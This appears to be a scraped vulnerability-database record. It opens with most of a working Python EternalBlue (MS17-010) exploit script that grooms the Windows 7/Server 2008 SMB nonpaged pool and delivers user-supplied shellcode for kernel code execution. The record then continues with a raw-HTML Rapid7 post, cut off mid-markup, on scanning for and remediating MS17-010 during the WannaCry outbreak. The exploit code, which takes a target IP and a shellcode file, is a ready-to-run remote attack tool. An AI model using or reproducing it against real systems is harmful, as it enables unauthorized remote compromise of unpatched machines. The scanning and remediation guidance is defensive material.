MDL.MdlFlags\r\nfakeSrvNetBufferNsa += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa\r\n \r\n# below is for targeting x64 only (all x86 related values are set to 0)\r\n# this is for show what fields need to be modified\r\nfakeSrvNetBufferX64 = pack('<II', 0x11000, 0)*2\r\nfakeSrvNetBufferX64 += pack('<HHIQ', 0xffff, 0, 0, 0)\r\nfakeSrvNetBufferX64 += '\\x00'*16\r\nfakeSrvNetBufferX64 += '\\x00'*16\r\nfakeSrvNetBufferX64 += '\\x00'*16 # 0x40\r\nfakeSrvNetBufferX64 += pack('<IIQ', 0, 0, TARGET_HAL_HEAP_ADDR_x64) # _, _, pointer to fake struct\r\nfakeSrvNetBufferX64 += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0x100, 0) # pmdl2\r\nfakeSrvNetBufferX64 += pack('<QHHI', 0, 0x60, 0x1004, 0) # MDL.Next, MDL.Size, MDL.MdlFlags\r\nfakeSrvNetBufferX64 += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64-0x80) # MDL.Process, MDL.MappedSystemVa\r\n \r\n \r\nfakeSrvNetBuffer = fakeSrvNetBufferNsa\r\n#fakeSrvNetBuffer = fakeSrvNetBufferX64\r\n \r\nfeaList = pack('<I', 0x10000) # the max value of feaList size is 0x10000 (the only value that can trigger bug)\r\nfeaList += ntfea[NTFEA_SIZE]\r\n# Note:\r\n# - SMB1 data buffer header is 16 bytes and 8 bytes on x64 and x86 respectively\r\n# - x64: below fea will be copy to offset 0x11000 of overflow buffer\r\n# - x86: below fea will be copy to offset 0x10ff8 of overflow buffer\r\nfeaList += pack('<BBH', 0, 0, len(fakeSrvNetBuffer)-1) + fakeSrvNetBuffer # -1 because first '\\x00' is for name\r\n# stop copying by invalid flag (can be any value except 0 and 0x80)\r\nfeaList += pack('<BBH', 0x12, 0x34, 0x5678)\r\n \r\n \r\n# fake struct for SrvNetWskReceiveComplete() and SrvNetCommonReceiveHandler()\r\n# x64: fake struct is at ffffffff ffd00010\r\n# offset 0xa0: LIST_ENTRY must be valid address. cannot be NULL.\r\n# offset 0x08: set to 3 (DWORD) for invoking ptr to function\r\n# offset 0x1d0: KSPIN_LOCK\r\n# offset 0x1d8: array of pointer to function\r\n#\r\n# code path to get code exection after this struct is controlled\r\n# SrvNetWskReceiveComplete() -> SrvNetCommonReceiveHandler() -> call fn_ptr\r\nfake_recv_struct = pack('<QII', 0, 3, 0)\r\nfake_recv_struct += '\\x00'*16\r\nfake_recv_struct += pack('<QII', 0, 3, 0)\r\nfake_recv_struct += ('\\x00'*16)*7\r\nfake_recv_struct += pack('<QQ', TARGET_HAL_HEAP_ADDR_x64+0xa0, TARGET_HAL_HEAP_ADDR_x64+0xa0) # offset 0xa0 (LIST_ENTRY to itself)\r\nfake_recv_struct += '\\x00'*16\r\nfake_recv_struct += pack('<IIQ', TARGET_HAL_HEAP_ADDR_x86+0xc0, TARGET_HAL_HEAP_ADDR_x86+0xc0, 0) # x86 LIST_ENTRY\r\nfake_recv_struct += ('\\x00'*16)*11\r\nfake_recv_struct += pack('<QII', 0, 0, TARGET_HAL_HEAP_ADDR_x86+0x190) # fn_ptr array on x86\r\nfake_recv_struct += pack('<IIQ', 0, TARGET_HAL_HEAP_ADDR_x86+0x1f0-1, 0) # x86 shellcode address\r\nfake_recv_struct += ('\\x00'*16)*3\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1e0) # offset 0x1d0: KSPINLOCK, fn_ptr array\r\nfake_recv_struct += pack('<QQ', 0, TARGET_HAL_HEAP_ADDR_x64+0x1f0-1) # x64 shellcode address - 1 (this value will be increment by one)\r\n \r\n \r\ndef getNTStatus(self):\r\n return (self['ErrorCode'] << 16) | (self['_reserved'] << 8) | self['ErrorClass']\r\nsetattr(smb.NewSMBPacket, \"getNTStatus\", getNTStatus)\r\n \r\ndef sendEcho(conn, tid, data):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_ECHO)\r\n transCommand['Parameters'] = smb.SMBEcho_Parameters()\r\n transCommand['Data'] = smb.SMBEcho_Data()\r\n \r\n transCommand['Parameters']['EchoCount'] = 1\r\n transCommand['Data']['Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('got good ECHO response')\r\n else:\r\n print('got bad ECHO response: 0x{:x}'.format(recvPkt.getNTStatus()))\r\n \r\n \r\n# do not know why Word Count can be 12\r\n# if word count is not 12, setting ByteCount without enough data will be failed\r\nclass SMBSessionSetupAndXCustom_Parameters(smb.SMBAndXCommand_Parameters):\r\n structure = (\r\n ('MaxBuffer','<H'),\r\n ('MaxMpxCount','<H'),\r\n ('VCNumber','<H'),\r\n ('SessionKey','<L'),\r\n #('AnsiPwdLength','<H'),\r\n ('UnicodePwdLength','<H'),\r\n ('_reserved','<L=0'),\r\n ('Capabilities','<L'),\r\n )\r\n \r\ndef createSessionAllocNonPaged(target, size):\r\n # The big nonpaged pool allocation is in BlockingSessionSetupAndX() function\r\n # You can see the allocation logic (even code is not the same) in WinNT4 source code \r\n # https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/smbadmin.c#L1050 till line 1071\r\n conn = smb.SMB(target, target)\r\n _, flags2 = conn.get_flags()\r\n # FLAGS2_EXTENDED_SECURITY MUST not be set\r\n flags2 &= ~smb.SMB.FLAGS2_EXTENDED_SECURITY\r\n # if not use unicode, buffer size on target machine is doubled because converting ascii to utf16\r\n if size >= 0xffff:\r\n flags2 &= ~smb.SMB.FLAGS2_UNICODE\r\n reqSize = size // 2\r\n else:\r\n flags2 |= smb.SMB.FLAGS2_UNICODE\r\n reqSize = size\r\n conn.set_flags(flags2=flags2)\r\n \r\n pkt = smb.NewSMBPacket()\r\n \r\n sessionSetup = smb.SMBCommand(smb.SMB.SMB_COM_SESSION_SETUP_ANDX)\r\n sessionSetup['Parameters'] = SMBSessionSetupAndXCustom_Parameters()\r\n \r\n sessionSetup['Parameters']['MaxBuffer'] = 61440 # can be any value greater than response size\r\n sessionSetup['Parameters']['MaxMpxCount'] = 2 # can by any value\r\n sessionSetup['Parameters']['VCNumber'] = os.getpid()\r\n sessionSetup['Parameters']['SessionKey'] = 0\r\n sessionSetup['Parameters']['AnsiPwdLength'] = 0\r\n sessionSetup['Parameters']['UnicodePwdLength'] = 0\r\n sessionSetup['Parameters']['Capabilities'] = 0x80000000\r\n \r\n # set ByteCount here\r\n sessionSetup['Data'] = pack('<H', reqSize) + '\\x00'*20\r\n pkt.addCommand(sessionSetup)\r\n \r\n conn.sendSMB(pkt)\r\n recvPkt = conn.recvSMB()\r\n if recvPkt.getNTStatus() == 0:\r\n print('SMB1 session setup allocate nonpaged pool success')\r\n else:\r\n print('SMB1 session setup allocate nonpaged pool failed')\r\n return conn\r\n \r\n \r\n# Note: impacket-0.9.15 struct has no ParameterDisplacement\r\n############# SMB_COM_TRANSACTION2_SECONDARY (0x33)\r\nclass SMBTransaction2Secondary_Parameters_Fixed(smb.SMBCommand_Parameters):\r\n structure = (\r\n ('TotalParameterCount','<H=0'),\r\n ('TotalDataCount','<H'),\r\n ('ParameterCount','<H=0'),\r\n ('ParameterOffset','<H=0'),\r\n ('ParameterDisplacement','<H=0'),\r\n ('DataCount','<H'),\r\n ('DataOffset','<H'),\r\n ('DataDisplacement','<H=0'),\r\n ('FID','<H=0'),\r\n )\r\n \r\ndef send_trans2_second(conn, tid, data, displacement):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n # assume no params\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_TRANSACTION2_SECONDARY)\r\n transCommand['Parameters'] = SMBTransaction2Secondary_Parameters_Fixed()\r\n transCommand['Data'] = smb.SMBTransaction2Secondary_Data()\r\n \r\n transCommand['Parameters']['TotalParameterCount'] = 0\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+18\r\n transCommand['Data']['Pad1'] = ''\r\n \r\n transCommand['Parameters']['ParameterCount'] = 0\r\n transCommand['Parameters']['ParameterOffset'] = 0\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - fixedOffset % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = len(data)\r\n transCommand['Parameters']['DataOffset'] = fixedOffset + pad2Len\r\n transCommand['Parameters']['DataDisplacement'] = displacement\r\n \r\n transCommand['Data']['Trans_Parameters'] = ''\r\n transCommand['Data']['Trans_Data'] = data\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n \r\n \r\ndef send_nt_trans(conn, tid, setup, data, param, firstDataFragmentSize, sendLastChunk=True):\r\n pkt = smb.NewSMBPacket()\r\n pkt['Tid'] = tid\r\n \r\n command = pack('<H', setup)\r\n \r\n transCommand = smb.SMBCommand(smb.SMB.SMB_COM_NT_TRANSACT)\r\n transCommand['Parameters'] = smb.SMBNTTransaction_Parameters()\r\n transCommand['Parameters']['MaxSetupCount'] = 1\r\n transCommand['Parameters']['MaxParameterCount'] = len(param)\r\n transCommand['Parameters']['MaxDataCount'] = 0\r\n transCommand['Data'] = smb.SMBTransaction2_Data()\r\n \r\n transCommand['Parameters']['Setup'] = command\r\n transCommand['Parameters']['TotalParameterCount'] = len(param)\r\n transCommand['Parameters']['TotalDataCount'] = len(data)\r\n \r\n fixedOffset = 32+3+38 + len(command)\r\n if len(param) > 0:\r\n padLen = (4 - fixedOffset % 4 ) % 4\r\n padBytes = '\\xFF' * padLen\r\n transCommand['Data']['Pad1'] = padBytes\r\n else:\r\n transCommand['Data']['Pad1'] = ''\r\n padLen = 0\r\n \r\n transCommand['Parameters']['ParameterCount'] = len(param)\r\n transCommand['Parameters']['ParameterOffset'] = fixedOffset + padLen\r\n \r\n if len(data) > 0:\r\n pad2Len = (4 - (fixedOffset + padLen + len(param)) % 4) % 4\r\n transCommand['Data']['Pad2'] = '\\xFF' * pad2Len\r\n else:\r\n transCommand['Data']['Pad2'] = ''\r\n pad2Len = 0\r\n \r\n transCommand['Parameters']['DataCount'] = firstDataFragmentSize\r\n transCommand['Parameters']['DataOffset'] = transCommand['Parameters']['ParameterOffset'] + len(param) + pad2Len\r\n \r\n transCommand['Data']['Trans_Parameters'] = param\r\n transCommand['Data']['Trans_Data'] = data[:firstDataFragmentSize]\r\n pkt.addCommand(transCommand)\r\n \r\n conn.sendSMB(pkt)\r\n conn.recvSMB() # must be success\r\n \r\n i = firstDataFragmentSize\r\n while i < len(data):\r\n sendSize = min(4096, len(data) - i)\r\n if len(data) - i <= 4096:\r\n if not sendLastChunk:\r\n break\r\n send_trans2_second(conn, tid, data[i:i+sendSize], i)\r\n i += sendSize\r\n \r\n if sendLastChunk:\r\n conn.recvSMB()\r\n return i\r\n \r\n \r\n# connect to target and send a large nbss size with data 0x80 bytes\r\n# this method is for allocating big nonpaged pool (no need to be same size as overflow buffer) on target\r\n# a nonpaged pool is allocated by srvnet.sys that started by useful struct (especially after overwritten)\r\ndef createConnectionWithBigSMBFirst80(target):\r\n # https://msdn.microsoft.com/en-us/library/cc246496.aspx\r\n # Above link is about SMB2, but the important here is first 4 bytes.\r\n # If using wireshark, you will see the StreamProtocolLength is NBSS length.\r\n # The first 4 bytes is same for all SMB version. It is used for determine the SMB message length.\r\n #\r\n # After received first 4 bytes, srvnet.sys allocate nonpaged pool for receving SMB message.\r\n # srvnet.sys forwards this buffer to SMB message handler after receiving all SMB message.\r\n # Note: For Windows 7 and Windows 2008, srvnet.sys also forwards the SMB message to its handler when connection lost too.\r\n sk = socket.create_connection((target, 445))\r\n # For this exploit, use size is 0x11000\r\n pkt = '\\x00' + '\\x00' + pack('>H', 0xfff7)\r\n # There is no need to be SMB2 because we got code execution by corrupted srvnet buffer.\r\n # Also this is invalid SMB2 message.\r\n # I believe NSA exploit use SMB2 for hiding alert from IDS\r\n #pkt += '\\xffSMB' # smb2\r\n # it can be anything even it is invalid\r\n pkt += 'BAAD' # can be any\r\n pkt += '\\x00'*0x7c\r\n sk.send(pkt)\r\n return sk\r\n \r\n \r\ndef exploit(target, shellcode, numGroomConn):\r\n # force using smb.SMB for SMB1\r\n conn = smb.SMB(target, target)\r\n \r\n # can use conn.login() for ntlmv2\r\n conn.login_standard('', '')\r\n server_os = conn.get_server_os()\r\n print('Target OS: '+server_os)\r\n if not (server_os.startswith(\"Windows 7 \") or server_os.startswith(\"Windows Server 2008 \")):\r\n print('This exploit does not support this target')\r\n sys.exit()\r\n \r\n \r\n tid = conn.tree_connect_andx('\\\\\\\\'+target+'\\\\'+'IPC$')\r\n \r\n # Here is code path in WinNT4 (all reference files are relative path to https://github.com/Safe3/WinNT4/blob/master/private/ntos/srv/)\r\n # - SrvSmbNtTransaction() (smbtrans.c#L2677)\r\n # - When all data is received, call ExecuteTransaction() at (smbtrans.c#L3113)\r\n # - ExecuteTransaction() (smbtrans.c#L82)\r\n # - Call dispatch table (smbtrans.c#L347)\r\n # - Dispatch table is defined at srvdata.c#L972 (target is command 0, SrvSmbOpen2() function)\r\n # - SrvSmbOpen2() (smbopen.c#L1002)\r\n # - call SrvOs2FeaListToNt() (smbopen.c#L1095)\r\n \r\n # https://msdn.microsoft.com/en-us/library/ee441720.aspx\r\n # Send special feaList to a target except last fragment with SMB_COM_NT_TRANSACT and SMB_COM_TRANSACTION2_SECONDARY command\r\n # Note: cannot use SMB_COM_TRANSACTION2 for the exploit because the TotalDataCount field is USHORT\r\n # Note: transaction max data count is 66512 (0x103d0) and DataDisplacement is USHORT\r\n progress = send_nt_trans(conn, tid, 0, feaList, '\\x00'*30, 2000, False)\r\n # we have to know what size of NtFeaList will be created when last fragment is sent\r\n \r\n # make sure server recv all payload before starting allocate big NonPaged\r\n #sendEcho(conn, tid, 'a'*12)\r\n \r\n # create buffer size NTFEA_SIZE-0x1000 at server\r\n # this buffer MUST NOT be big enough for overflown buffer\r\n allocConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x1010)\r\n \r\n # groom nonpaged pool\r\n # when many big nonpaged pool are allocated, allocate another big nonpaged pool should be next to the last one\r\n srvnetConn = []\r\n for i in range(numGroomConn):\r\n sk = createConnectionWithBigSMBFirst80(target)\r\n srvnetConn.append(sk)\r\n \r\n # create buffer size NTFEA_SIZE at server\r\n # this buffer will be replaced by overflown buffer\r\n holeConn = createSessionAllocNonPaged(target, NTFEA_SIZE - 0x10)\r\n # disconnect allocConn to free buffer\r\n # expect small nonpaged pool allocation is not allocated next to holeConn because of this free buffer\r\n allocConn.get_socket().close()\r\n \r\n # hope one of srvnetConn is next to holeConn\r\n for i in range(5):\r\n sk = createConnectionWithBigSMBFirst80(target)\r\n srvnetConn.append(sk)\r\n \r\n # send echo again, all new 5 srvnet buffers should be created\r\n #sendEcho(conn, tid, 'a'*12)\r\n \r\n # remove holeConn to create hole for fea buffer\r\n holeConn.get_socket().close()\r\n \r\n # send last fragment to create buffer in hole and OOB write one of srvnetConn struct header\r\n send_trans2_second(conn, tid, feaList[progress:], progress)\r\n recvPkt = conn.recvSMB()\r\n retStatus = recvPkt.getNTStatus()\r\n # retStatus MUST be 0xc000000d (INVALID_PARAMETER) because of invalid fea flag\r\n if retStatus == 0xc000000d:\r\n print('good response status: INVALID_PARAMETER')\r\n else:\r\n print('bad response status: 0x{:08x}'.format(retStatus))\r\n \r\n \r\n # one of srvnetConn struct header should be modified\r\n # a corrupted buffer will write recv data in designed memory address\r\n for sk in srvnetConn:\r\n sk.send(fake_recv_struct + shellcode)\r\n \r\n # execute shellcode by closing srvnet connection\r\n for sk in srvnetConn:\r\n sk.close()\r\n \r\n # nicely close connection (no need for exploit)\r\n conn.disconnect_tree(tid)\r\n conn.logoff()\r\n conn.get_socket().close()\r\n \r\n \r\nif len(sys.argv) < 3:\r\n print(\"{} <ip> <shellcode_file> [numGroomConn]\".format(sys.argv[0]))\r\n sys.exit(1)\r\n \r\nTARGET=sys.argv[1]\r\nnumGroomConn = 13 if len(sys.argv) < 4 else int(sys.argv[3])\r\n \r\nfp = open(sys.argv[2], 'rb')\r\nsc = fp.read()\r\nfp.close()\r\n \r\nprint('shellcode size: {:d}'.format(len(sc)))\r\nprint('numGroomConn: {:d}'.format(numGroomConn))\r\n \r\nexploit(TARGET, sc, numGroomConn)\r\nprint('done')\n\n# 0day.today [2018-02-06] #", "sourceHref": "https://0day.today/exploit/27802", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "rapid7community": [{"lastseen": "2017-05-15T18:48:41", "description": "<!-- [DocumentBodyStart:2ca40ae4-bf1e-4d07-bca8-48bcdefcec45] --><div class=\"jive-rendered-content\"><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Today, security teams are starting their work week with a scramble to remediate MS17-010, in order to prevent the associated <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fsecurity-response%2Fwanna-decryptor\" target=\"_blank\">ransomware attack, WannaCry</a>, also known as Wanna Decryptor, WNCRY, and Wanna Decryptor 2.0 (how I miss the halcyon days when vulnerabilities had gentle names like Poodle). </span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">With all of the WannaCry information circulating we want to keep this simple. First, check out this link to an <a class=\"jive-link-blog-small\" data-containerId=\"5165\" data-containerType=\"37\" data-objectId=\"7869\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/infosec/blog/2017/05/12/wanna-decryptor-wncry-ransomware-explained\">overview of the WannaCry ransomware vulnerability</a> written by <a class=\"jive-link-profile-small jiveTT-hover-user\" data-containerId=\"-1\" data-containerType=\"-1\" data-objectId=\"29826\" data-objectType=\"3\" href=\"https://community.rapid7.com/people/hrbrmstr\">Bob Rudis</a></span><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">, and then review the below steps to quickly scan for this vulnerability in your own infrastructure (if you aren’t already a customer, go </span><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2Fdownload%2F\" target=\"_blank\"><span style=\"font-size: 11pt; font-family: Arial; color: #1155cc;\">try out InsightVM for free</span></a><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"> you can use this free trial to scan for this vulnerability across your environment), create a dynamic asset group to continuously see affected assets, as well as create a dynamic remediation project to track the progress of remediating WannaCry.</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">Here is the InsightVM/Nexpose step-by-step guide to create a scan template specifically to look for MS17-010:</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">1. Under the Administration tab, go to Templates > Manage Templates</span></p><p><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66939/pastedImage_11.png\"><img class=\"image-1 jive-image\" height=\"276\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66939/754-276/pastedImage_11.png\" style=\" width: 754.425px;\" width=\"754\"/></a></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">2. Copy the following template: Full Audit enhanced logging without Web Spider. Don’t forget to give your copy a name and description; here, we’ll call it “WNCRY Scan Template”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66940/pastedImage_12.png\"><img class=\"image-2 jive-image\" height=\"299\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66940/758-299/pastedImage_12.png\" style=\"width:758px; height: 301.367px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66944/pastedImage_13.png\"><img class=\"image-3 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66944/758-275/pastedImage_13.png\" style=\" width: 798.319px;\" width=\"758\"/></a></span></span><span><span><br/></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">3. Click on Vulnerability Checks and then “By Individual Check”</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66945/pastedImage_14.png\"><img class=\"jive-image image-4\" height=\"322\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66945/758-322/pastedImage_14.png\" style=\" width: 867.529px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">4. Add Check “<a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fmodules%2Fauxiliary%2Fscanner%2Fsmb%2Fsmb_ms17_010\" target=\"_blank\">MS17-010</a>” and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66946/pastedImage_15.png\"><img class=\"image-5 jive-image\" height=\"275\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66946/758-275/pastedImage_15.png\" style=\" width:758px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">This should come back with 192 checks that are related to MS17-010. The related CVEs are:</span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0143\" target=\"_blank\">CVE-2017-0143</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0144\" target=\"_blank\">CVE-2017-0144</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0145\" target=\"_blank\">CVE-2017-0145</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0146\" target=\"_blank\">CVE-2017-0146</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0147\" target=\"_blank\">CVE-2017-0147</a></span></p><p dir=\"ltr\" style=\"margin-top: 8pt; margin-left: 36pt;\"><span style=\"font-size: 10.5pt; font-family: Arial; color: #333333;\"><a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fdb%2Fvulnerabilities%2Fmsft-cve-2017-0148\" target=\"_blank\">CVE-2017-0148</a></span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">5. Now, under \"By Category\" click “Remove Categories”, select all, and click save:</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66950/pastedImage_16.png\"><img class=\"image-6 jive-image\" height=\"202\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66950/758-202/pastedImage_16.png\" style=\" width: 973.212px;\" width=\"758\"/></a></span></p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66952/pastedImage_18.png\"><img class=\"jive-image image-8\" height=\"161\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66952/758-161/pastedImage_18.png\" style=\" width: 1008.09px;\" width=\"758\"/></a></span></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">6. And finally, under Check Type, click “Remove Check Types”, select all, and click save</span></p><p dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66953/pastedImage_20.png\"><img class=\"image-9 jive-image\" height=\"122\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66953/758-122/pastedImage_20.png\" style=\" width: 1060.2px;\" width=\"758\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\"><span style=\"font-size: 11pt; font-family: Arial; color: #000000;\">7. Save the template and run a scan to identify all assets with MS17-010.</span></h2><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2><span style=\"font-size: 18pt;\">Creating a Dynamic Asset Group for MS17-010</span></h2><p><span style=\"font-size: 12pt;\">Now that you have your assets scanned, you may want to create a Dynamic Asset Group to report/tag off of that will update itself whenever new assets are found with this vulnerability (and when they are fixed). To get started, click on the filter icon in the top right of the <a class=\"jive-link-external-small\" href=\"https://community.rapid7.com/external-link.jspa?url=https%3A%2F%2Fwww.rapid7.com%2Fproducts%2Finsightvm%2F\" target=\"_blank\">InsightVM</a> console, just under the search button:<br/></span></p><p><span style=\"font-size: 12pt;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66963/pastedImage_34.png\"><img class=\"image-13 jive-image\" height=\"118\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66963/468-118/pastedImage_34.png\" style=\" width: 468.099px;\" width=\"468\"/></a></span></p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\">Now, use the \"CVE ID\" filter to specify the CVEs listed below:</span></p><p dir=\"ltr\"><span style=\"font-size: 12pt; font-family: Arial; color: #000000;\"><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66971/pastedImage_1.png\"><img class=\"jive-image image-14\" height=\"513\" src=\"https://community.rapid7.com/servlet/JiveServlet/downloadImage/38-7866-66971/758-513/pastedImage_1.png\" style=\" width: 804.524px;\" width=\"758\"/></a></span></p><p dir=\"ltr\">This asset group can now be used for reporting as well as tagging to quickly identify exposed systems.</p><p dir=\"ltr\" style=\"min-height: 8pt; padding: 0px;\"> </p><h2 dir=\"ltr\">Creating a WannaCry Dashboard</h2><p dir=\"ltr\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">Recently, Ken Mizota posted an article on how to build a custom dashboard to </span><a class=\"jive-link-blog-small\" data-containerId=\"1004\" data-containerType=\"37\" data-objectId=\"7855\" data-objectType=\"38\" href=\"https://community.rapid7.com/community/nexpose/blog/2017/05/09/practical-vm-tips-for-the-shadow-brokers-leaked-exploits\"><span style=\"font-size: 11.5pt; font-family: Arial; color: #3f98d4;\">track your exposure to exploits from the Shadow Brokers leak</span></a><span style=\"font-size: 11.5pt; font-family: Arial; color: #303030;\">. If you already did that, you're good to go! If you wanted to be specific to WannaCry, you could use this Dashboard filter:</span></p><p><span style=\"background-color: #f6f6f6; color: #000000; font-size: 12pt; font-family: Calibri;\">asset.vulnerability.title CONTAINS \"cve-2017-0143\" OR asset.vulnerability.title CONTAINS \"cve-2017-0144\" OR asset.vulnerability.title CONTAINS \"cve-2017-0145\" OR asset.vulnerability.title CONTAINS \"cve-2017-0146\" OR asset.vulnerability.title CONTAINS \"cve-2017-0147\" OR asset.vulnerability.title CONTAINS \"cve-2017-0148\"</span></p><p style=\"min-height: 8pt; padding: 0px;\"> </p><h2>Creating a Remediation Project for MS17-010:</h2><p>In InsightVM, you can also create a remediation project for MS17-010 to track the progress of remediation live. To do this, go to the “Projects” tab and click “Create a Project”:</p><p dir=\"ltr\"><span><span><a href=\"https://community.rapid7.com/servlet/JiveServlet/showImage/38-7866-66955/pastedImage_28.png\"><img class=\"image-11 jive-image\" height=\"174\" 